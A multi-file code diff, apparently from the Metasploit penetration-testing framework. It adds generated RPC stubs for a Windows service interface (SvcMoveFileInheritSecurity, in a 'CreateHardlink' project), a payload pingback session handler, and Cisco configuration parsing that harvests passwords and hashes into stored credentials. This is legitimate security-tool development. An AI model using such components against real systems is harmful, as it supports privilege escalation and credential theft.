+			0x0,		/* 0 */
+/* 1092 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1094 */	NdrFcShort( 0x38 ),	/* 56 */
+/* 1096 */	NdrFcShort( 0x40 ),	/* 64 */
+/* 1098 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x2,		/* 2 */
+/* 1100 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1102 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1104 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1106 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1108 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1110 */	NdrFcShort( 0x11a ),	/* Flags:  must free, in, out, simple ref, */
+/* 1112 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1114 */	NdrFcShort( 0x80 ),	/* Type Offset=128 */
+
+	/* Parameter arg_1 */
+
+/* 1116 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1118 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1120 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+			0x0
+        }
+    };
+
+static const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString =
+    {
+        0,
+        {
+			NdrFcShort( 0x0 ),	/* 0 */
+/*  2 */	
+			0x11, 0xc,	/* FC_RP [alloced_on_stack] [simple_pointer] */
+/*  4 */	0x8,		/* FC_LONG */
+			0x5c,		/* FC_PAD */
+/*  6 */	
+			0x11, 0x0,	/* FC_RP */
+/*  8 */	NdrFcShort( 0x1a ),	/* Offset= 26 (34) */
+/* 10 */	
+			0x1d,		/* FC_SMFARRAY */
+			0x1,		/* 1 */
+/* 12 */	NdrFcShort( 0x208 ),	/* 520 */
+/* 14 */	0x5,		/* FC_WCHAR */
+			0x5b,		/* FC_END */
+/* 16 */	
+			0x1d,		/* FC_SMFARRAY */
+			0x0,		/* 0 */
+/* 18 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 20 */	0x1,		/* FC_BYTE */
+			0x5b,		/* FC_END */
+/* 22 */	
+			0x15,		/* FC_STRUCT */
+			0x3,		/* 3 */
+/* 24 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 26 */	0x8,		/* FC_LONG */
+			0x6,		/* FC_SHORT */
+/* 28 */	0x6,		/* FC_SHORT */
+			0x4c,		/* FC_EMBEDDED_COMPLEX */
+/* 30 */	0x0,		/* 0 */
+			NdrFcShort( 0xfff1 ),	/* Offset= -15 (16) */
+			0x5b,		/* FC_END */
+/* 34 */	
+			0x15,		/* FC_STRUCT */
+			0x7,		/* 7 */
+/* 36 */	NdrFcShort( 0x448 ),	/* 1096 */
+/* 38 */	0x8,		/* FC_LONG */
+			0x4c,		/* FC_EMBEDDED_COMPLEX */
+/* 40 */	0x0,		/* 0 */
+			NdrFcShort( 0xffe1 ),	/* Offset= -31 (10) */
+			0x8,		/* FC_LONG */
+/* 44 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 46 */	0x8,		/* FC_LONG */
+			0x6,		/* FC_SHORT */
+/* 48 */	0x6,		/* FC_SHORT */
+			0x4c,		/* FC_EMBEDDED_COMPLEX */
+/* 50 */	0x0,		/* 0 */
+			NdrFcShort( 0xffe3 ),	/* Offset= -29 (22) */
+			0x8,		/* FC_LONG */
+/* 54 */	0xb,		/* FC_HYPER */
+			0x4c,		/* FC_EMBEDDED_COMPLEX */
+/* 56 */	0x0,		/* 0 */
+			NdrFcShort( 0xffd1 ),	/* Offset= -47 (10) */
+			0x8,		/* FC_LONG */
+/* 60 */	0x8,		/* FC_LONG */
+			0x5b,		/* FC_END */
+/* 62 */	
+			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
+/* 64 */	NdrFcShort( 0x8 ),	/* Offset= 8 (72) */
+/* 66 */	
+			0x1d,		/* FC_SMFARRAY */
+			0x3,		/* 3 */
+/* 68 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 70 */	0x8,		/* FC_LONG */
+			0x5b,		/* FC_END */
+/* 72 */	
+			0x15,		/* FC_STRUCT */
+			0x3,		/* 3 */
+/* 74 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 76 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 78 */	NdrFcShort( 0xfff4 ),	/* Offset= -12 (66) */
+/* 80 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 82 */	
+			0x11, 0x0,	/* FC_RP */
+/* 84 */	NdrFcShort( 0x2 ),	/* Offset= 2 (86) */
+/* 86 */	
+			0x15,		/* FC_STRUCT */
+			0x3,		/* 3 */
+/* 88 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 90 */	0x8,		/* FC_LONG */
+			0x6,		/* FC_SHORT */
+/* 92 */	0x3e,		/* FC_STRUCTPAD2 */
+			0x8,		/* FC_LONG */
+/* 94 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 96 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 98 */	
+			0x11, 0x8,	/* FC_RP [simple_pointer] */
+/* 100 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 102 */	
+			0x11, 0x0,	/* FC_RP */
+/* 104 */	NdrFcShort( 0x2 ),	/* Offset= 2 (106) */
+/* 106 */	
+			0x1a,		/* FC_BOGUS_STRUCT */
+			0x3,		/* 3 */
+/* 108 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 110 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 112 */	NdrFcShort( 0x0 ),	/* Offset= 0 (112) */
+/* 114 */	0x8,		/* FC_LONG */
+			0x8,		/* FC_LONG */
+/* 116 */	0x8,		/* FC_LONG */
+			0x6,		/* FC_SHORT */
+/* 118 */	0x3e,		/* FC_STRUCTPAD2 */
+			0x5b,		/* FC_END */
+/* 120 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 122 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 124 */	
+			0x11, 0x0,	/* FC_RP */
+/* 126 */	NdrFcShort( 0x2 ),	/* Offset= 2 (128) */
+/* 128 */	
+			0x15,		/* FC_STRUCT */
+			0x3,		/* 3 */
+/* 130 */	NdrFcShort( 0x14 ),	/* 20 */
+/* 132 */	0x8,		/* FC_LONG */
+			0x6,		/* FC_SHORT */
+/* 134 */	0x3e,		/* FC_STRUCTPAD2 */
+			0x8,		/* FC_LONG */
+/* 136 */	0x8,		/* FC_LONG */
+			0x8,		/* FC_LONG */
+/* 138 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+
+			0x0
+        }
+    };
+
+static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
+    {
+    0,
+    54,
+    108,
+    162,
+    210,
+    264,
+    324,
+    378,
+    426,
+    474,
+    522,
+    582,
+    642,
+    684,
+    732,
+    786,
+    840,
+    876,
+    924,
+    972,
+    1026,
+    1080
+    };
+
+
+static const MIDL_STUB_DESC DefaultIfName_StubDesc = 
+    {
+    (void *)& DefaultIfName___RpcClientInterface,
+    MIDL_user_allocate,
+    MIDL_user_free,
+    &DefaultIfName__MIDL_AutoBindHandle,
+    0,
+    0,
+    0,
+    0,
+    rpc__MIDL_TypeFormatString.Format,
+    1, /* -error bounds_check flag */
+    0x50002, /* Ndr library version */
+    0,
+    0x800025b, /* MIDL Version 8.0.603 */
+    0,
+    0,
+    0,  /* notify & notify_flag routine table */
+    0x1, /* MIDL flag */
+    0, /* cs routines */
+    0,   /* proxy/server info */
+    0
+    };
+#if _MSC_VER >= 1200
+#pragma warning(pop)
+#endif
+
+
+#endif /* defined(_M_AMD64)*/
+
@@ -0,0 +1,259 @@
+
+
+/* this ALWAYS GENERATED file contains the definitions for the interfaces */
+
+
+ /* File created by MIDL compiler version 8.00.0603 */
+/* at Tue Jul 02 08:26:16 2019
+ */
+/* Compiler settings for rpc.idl:
+    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 
+    protocol : dce , ms_ext, c_ext, robust
+    error checks: allocation ref bounds_check enum stub_data 
+    VC __declspec() decoration level: 
+         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
+         DECLSPEC_UUID(), MIDL_INTERFACE()
+*/
+/* @@MIDL_FILE_HEADING(  ) */
+
+#pragma warning( disable: 4049 )  /* more than 64k source lines */
+
+
+/* verify that the <rpcndr.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCNDR_H_VERSION__
+#define __REQUIRED_RPCNDR_H_VERSION__ 475
+#endif
+
+#include "rpc.h"
+#include "rpcndr.h"
+
+#ifndef __RPCNDR_H_VERSION__
+#error this stub requires an updated version of <rpcndr.h>
+#endif // __RPCNDR_H_VERSION__
+
+
+#ifndef __rpc_h_h__
+#define __rpc_h_h__
+
+#if defined(_MSC_VER) && (_MSC_VER >= 1020)
+#pragma once
+#endif
+
+/* Forward Declarations */ 
+
+/* header files for imported files */
+#include "oaidl.h"
+#include "ocidl.h"
+
+#ifdef __cplusplus
+extern "C"{
+#endif 
+
+
+#ifndef __DefaultIfName_INTERFACE_DEFINED__
+#define __DefaultIfName_INTERFACE_DEFINED__
+
+/* interface DefaultIfName */
+/* [version][uuid] */ 
+
+typedef struct Struct_22_t
+    {
+    long StructMember0;
+    short StructMember1;
+    short StructMember2;
+    byte StructMember3[ 8 ];
+    } 	Struct_22_t;
+
+typedef struct Struct_34_t
+    {
+    long StructMember0;
+    wchar_t StructMember1[ 260 ];
+    long StructMember2;
+    short StructMember3;
+    short StructMember4;
+    long StructMember5;
+    short StructMember6;
+    short StructMember7;
+    struct Struct_22_t StructMember8;
+    long StructMember9;
+    hyper StructMember10;
+    wchar_t StructMember11[ 260 ];
+    long StructMember12;
+    long StructMember13;
+    } 	Struct_34_t;
+
+typedef struct Struct_76_t
+    {
+    long StructMember0[ 2 ];
+    } 	Struct_76_t;
+
+typedef struct Struct_90_t
+    {
+    long StructMember0;
+    short StructMember1;
+    long StructMember2;
+    short StructMember3;
+    short StructMember4;
+    } 	Struct_90_t;
+
+typedef struct Struct_112_t
+    {
+    long StructMember0;
+    long StructMember1;
+    long StructMember2;
+    short StructMember3;
+    } 	Struct_112_t;
+
+typedef struct Struct_134_t
+    {
+    long StructMember0;
+    short StructMember1;
+    long StructMember2;
+    long StructMember3;
+    long StructMember4;
+    } 	Struct_134_t;
+
+typedef struct Struct_162_t
+    {
+    double StructMember0;
+    wchar_t StructMember1[ 39 ];
+    } 	Struct_162_t;
+
+long Proc0( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ long arg_3);
+
+long Proc1( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ long arg_3);
+
+long Proc2( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ long arg_3);
+
+long Proc3( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [out] */ long *arg_2);
+
+long Proc4( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [out][in] */ struct Struct_34_t *arg_3);
+
+long Proc5( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ short arg_2,
+    /* [in] */ long arg_3,
+    /* [out] */ struct Struct_76_t *arg_4);
+
+long Proc6( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ long arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ long arg_3);
+
+long Proc7( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ long arg_1,
+    /* [in] */ long arg_2);
+
+long Proc8( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ long arg_1,
+    /* [in] */ long arg_2);
+
+long Proc9( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2);
+
+long Proc10( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ short arg_3,
+    /* [out] */ long *arg_4);
+
+long Proc11( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ short arg_3,
+    /* [in] */ long arg_4);
+
+long Proc12( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ struct Struct_90_t *arg_1);
+
+long Proc13( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2);
+
+__int3264 SvcMoveFileInheritSecurity( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *src,
+    /* [string][in] */ wchar_t *dest,
+    /* [in] */ long flags);
+
+long Proc15( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [out][in] */ struct Struct_112_t *arg_3);
+
+long Proc16( 
+    /* [in] */ handle_t IDL_handle);
+
+long Proc17( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2);
+
+long Proc18( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [out] */ long *arg_2);
+
+long Proc19( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [string][unique][in] */ wchar_t *arg_2,
+    /* [out] */ long *arg_3);
+
+long Proc20( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [string][unique][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3);
+
+long Proc21( 
+    /* [in] */ handle_t IDL_handle,
+    /* [out][in] */ struct Struct_134_t *arg_1);
+
+
+
+extern RPC_IF_HANDLE DefaultIfName_v0_0_c_ifspec;
+extern RPC_IF_HANDLE DefaultIfName_v0_0_s_ifspec;
+#endif /* __DefaultIfName_INTERFACE_DEFINED__ */
+
+/* Additional Prototypes for ALL interfaces */
+
+/* end of Additional Prototypes */
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif
+
+
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CreateHardlink.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
@@ -0,0 +1,13 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include <stdio.h>
+#include <tchar.h>
+#include <Windows.h>
+#include "CommonUtils.h"
+#include "ntimports.h"
+#include "typed_buffer.h"
@@ -0,0 +1,70 @@
+#pragma once
+
+#include <memory>
+#include <algorithm>
+
+template<class T>
+class typed_buffer_ptr {
+	std::unique_ptr<char[]> buffer_;
+	size_t size_;
+
+public:
+	typed_buffer_ptr() {
+	}
+
+	explicit typed_buffer_ptr(size_t size) {
+		reset(size);
+	}
+
+	void reset(size_t size) {
+		buffer_.reset(new char[size]);
+		memset(buffer_.get(), 0, size);
+		size_ = size;
+	}
+
+	void resize(size_t size) {
+		std::unique_ptr<char[]> tmp(new char[size]);
+
+		memcpy(tmp.get(), buffer_.get(), min(size, size_));
+
+		buffer_ = std::move(tmp);
+	}
+
+	operator T*() {
+		return reinterpret_cast<T*>(buffer_.get());
+	}
+
+	operator const T*() const {
+		return cget();
+	}
+
+	T* operator->() const {
+		return reinterpret_cast<T*>(buffer_.get());
+	}
+
+	const T* cget() const {
+		return interpret_cast<const T*>(buffer_.get());
+	}
+
+	typed_buffer_ptr(const typed_buffer_ptr<T>& other) = delete;
+	typed_buffer_ptr& typed_buffer_ptr::operator=(const typed_buffer_ptr<T>& other) = delete;
+
+	typed_buffer_ptr(typed_buffer_ptr<T>&& other) {
+		buffer_ = std::move(other.buffer_);
+		size_ = other.size_;
+		other.size_ = 0;
+	}
+
+	typed_buffer_ptr& operator=(typed_buffer_ptr<T>&& other) {
+		if (this != &other)
+		{
+			buffer_ = std::move(other.buffer_);
+			size_ = other.size_;
+			other.size_ = 0;
+		}
+	}
+
+	size_t size() const {
+		return size_;
+	}
+};
@@ -41,4 +41,4 @@ module DataProxyAutoLoader
  include VulnAttemptDataProxy
  include MsfDataProxy
  include PayloadDataProxy
-end
+end
@@ -3,7 +3,6 @@ module PayloadDataProxy
  def payloads(opts)
    begin
      self.data_service_operation do |data_service|
-        add_opts_workspace(opts)
        data_service.payloads(opts)
      end
    rescue => e
@@ -14,7 +13,6 @@ module PayloadDataProxy
  def create_payload(opts)
    begin
      self.data_service_operation do |data_service|
-        add_opts_workspace(opts)
        data_service.create_payload(opts)
      end
    rescue => e
@@ -41,5 +41,4 @@ module DataServiceAutoLoader
  include RemoteMsfDataService
  include RemoteDbImportDataService
  include RemotePayloadDataService
-
 end
@@ -39,6 +39,9 @@ module Metasploit
        #
        #   @return [Symbol] An element of {VERBOSITIES}.
        attr_accessor :verbosity
+        # @!attribute skip_gather_proof
+        #   @return [Boolean] Whether to skip calling gather_proof
+        attr_accessor :skip_gather_proof

        validates :verbosity,
          presence: true,
@@ -90,7 +93,7 @@ module Metasploit

          unless result_options.has_key? :status
            if ssh_socket
-              proof = gather_proof
+              proof = gather_proof unless skip_gather_proof
              result_options.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: proof)
            else
              result_options.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: nil)
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "5.0.35"
+      VERSION = "5.0.44"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -347,7 +347,7 @@ class CommandShell
    # /etc/passwd
    # $ ls /etc/nosuchfile
    # ls: cannot access '/etc/nosuchfile': No such file or directory
-    result = shell_command_token("ls #{path}").strip
+    result = shell_command_token("ls #{path}").to_s.strip
    if result.eql?(path)
      return true
    end
@@ -14,6 +14,7 @@ module Sessions
 # with the server instance both at an API level as well as at a console level.
 #
 ###
+
 class Meterpreter < Rex::Post::Meterpreter::Client

  include Msf::Session
@@ -0,0 +1,98 @@
+# -*- coding: binary -*-
+require 'msf/base'
+
+module Msf
+module Sessions
+
+###
+#
+# This class provides the ability to receive a pingback UUID
+#
+###
+class Pingback
+
+  #
+  # This interface supports basic interaction.
+  #
+  include Msf::Session
+  include Msf::Session::Basic
+
+  attr_accessor :arch
+  attr_accessor :platform
+  attr_accessor :uuid_string
+
+  #
+  # Returns the type of session.
+  #
+  def self.type
+    "pingback"
+  end
+
+  def initialize(rstream, opts = {})
+    super
+    self.platform ||= ""
+    self.arch     ||= ""
+    datastore = opts[:datastore]
+  end
+
+  def self.create_session(rstream, opts = {})
+    Msf::Sessions::Pingback.new(rstream, opts)
+  end
+
+  def process_autoruns(datastore)
+    uuid_read
+    cleanup
+  end
+
+  def cleanup
+    if rstream
+      # this is also a best-effort
+      rstream.close rescue nil
+      rstream = nil
+    end
+  end
+
+  def uuid_read
+    uuid_raw = rstream.get_once(16, 1)
+    return nil unless uuid_raw
+    self.uuid_string = uuid_raw.each_byte.map { |b| "%02x" % b.to_i() }.join
+    print_status("Incoming UUID = #{uuid_string}")
+    if framework.db.active
+      begin
+        payload = framework.db.payloads(uuid: uuid_string).first
+        if payload.nil?
+          print_warning("Provided UUID (#{uuid_string}) was not found in database!")
+        else
+          print_good("UUID identified (#{uuid_string})")
+        end
+      rescue ActiveRecord::ConnectionNotEstablished
+        print_status("WARNING: UUID verification and logging is not available, because the database is not active.")
+      rescue => e
+        # TODO: Can we have a more specific exception handler?
+        # Test: what if we send no bytes back?  What if we send less than 16 bytes?  Or more than?
+        elog("Can't get original UUID")
+        elog("Exception Class: #{e.class.name}")
+        elog("Exception Message: #{e.message}")
+        elog("Exception Backtrace: #{e.backtrace}")
+      end
+    else
+      print_warning("WARNING: UUID verification and logging is not available, because the database is not active.")
+    end
+  end
+
+  #
+  # Returns the session description.
+  #
+  def desc
+    "Pingback"
+  end
+
+  #
+  # Calls the class method
+  #
+  def type
+    self.class.type
+  end
+end
+end
+end
@@ -98,7 +98,7 @@ module Payload
        output =
          Buffer.comment(
            "#{payload.refname} - #{len} bytes#{payload.staged? ? " (stage 1)" : ""}\n" +
-            "http://www.metasploit.com\n" +
+            "https://metasploit.com/\n" +
            ((e.encoder) ? "Encoder: #{e.encoder.refname}\n" : '') +
            ((e.nop) ?     "NOP gen: #{e.nop.refname}\n" : '') +
            "#{ou}",
@@ -115,7 +115,7 @@ module Payload
              "\n" +
              Buffer.comment(
                "#{payload.refname} - #{stage.length} bytes (stage 2)\n" +
-                "http://www.metasploit.com\n",
+                "https://metasploit.com/\n",
                fmt) +
              Buffer.transform(stage, fmt)
          end
@@ -119,6 +119,7 @@ class Auxiliary < Msf::Module
  # Called directly before 'run'
  #
  def setup
+    alert_user
  end

  #
@@ -273,6 +273,7 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
+            cred[:username] = user.to_s
            cred[:private_data] = spass
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
@@ -283,6 +284,7 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")

            cred = credential_data.dup
+            cred[:username] = user.to_s
            cred[:private_data] = spass
            cred[:private_type] = :password
            create_credential_and_login(cred)
@@ -294,21 +296,23 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")

            cred = credential_data.dup
+            cred[:username] = user.to_s
            cred[:private_data] = spass
            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

        # This regex captures ephones from Cisco Unified Communications Manager Express (CUE) which come in forms like:
-        # username &#34;phonefour&#34; password 444444
+        # username "phonefour" password 444444
        # username test password test
        # This is used for the voicemail system
-        when /^\s*username (?:&#34;)([^\s]+)(?:&#34;) password ([^\s]+)/i
+        when /^\s*username "?([\da-z]+)"? password ([^\s]+)/i
          user  = $1
          spass = $2
          print_good("#{thost}:#{tport} ePhone Username '#{user}' with Password: #{spass}")
          store_loot("cisco.ios.ephone.username_password", "text/plain", thost, "#{user}:#{spass}", "ephone_username_password.txt", "Cisco IOS ephone Username and Password")
          cred = credential_data.dup
+          cred[:username] = user.to_s
          cred[:private_data] = spass
          cred[:private_type] = :password
          create_credential_and_login(cred)
@@ -323,6 +327,7 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
+            cred[:username] = user.to_s
            cred[:private_data] = spass
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
@@ -333,6 +338,7 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")

            cred = credential_data.dup
+            cred[:username] = user.to_s
            cred[:private_data] = spass
            cred[:private_type] = :password
            create_credential_and_login(cred)
@@ -344,6 +350,38 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")

            cred = credential_data.dup
+            cred[:username] = user.to_s
+            cred[:private_data] = spass
+            cred[:private_type] = :password
+            create_credential_and_login(cred)
+          end
+
+        # https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/command/reference/cme_cr/cme_cr_chapter_010101.html#wp3722577363
+        when /^\s*web admin (customer|system) name ([^\s]+) (secret [0|5]|password) ([^\s]+)/i
+          puts "GOTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT"
+          login = $1
+          suser = $2
+          stype = $3
+          spass = $4
+          puts stype.to_s
+          if stype == 'secret 5'
+            print_good("#{thost}:#{tport} Web Admin Username: #{suser} Type: #{login} MD5 Encrypted Password: #{spass}")
+            store_loot("cisco.ios.web_username_password_hash", "text/plain", thost, "#{suser}:#{spass}", "web_username_password_hash.txt", "Cisco IOS Web Username and Password Hash (MD5)")
+
+            cred = credential_data.dup
+            cred[:jtr_format] = 'md5'
+            cred[:username] = suser.to_s
+            cred[:private_data] = spass
+            cred[:private_type] = :nonreplayable_hash
+            create_credential_and_login(cred)
+          end
+
+          if stype == 'secret 0' || stype == 'password'
+            print_good("#{thost}:#{tport} Web Username: #{suser} Type: #{login} Password: #{spass}")
+            store_loot("cisco.ios.web_username_password", "text/plain", thost, "#{suser}:#{spass}", "web_username_password.txt", "Cisco IOS Web Username and Password")
+
+            cred = credential_data.dup
+            cred[:username] = suser.to_s
            cred[:private_data] = spass
            cred[:private_type] = :password
            create_credential_and_login(cred)
@@ -361,6 +399,7 @@ module Auxiliary::Cisco

            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
+            cred[:username] = suser.to_s
            cred[:private_data] = spass
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
@@ -371,6 +410,7 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")

            cred = credential_data.dup
+            cred[:username] = suser.to_s
            cred[:private_data] = spass
            cred[:private_type] = :password
            create_credential_and_login(cred)
@@ -382,6 +422,7 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")

            cred = credential_data.dup
+            cred[:username] = suser.to_s
            cred[:private_data] = spass
            cred[:private_type] = :password
            create_credential_and_login(cred)
@@ -427,3 +468,4 @@ module Auxiliary::Cisco

 end
 end
+
--- a/Show More
+++ b/Show More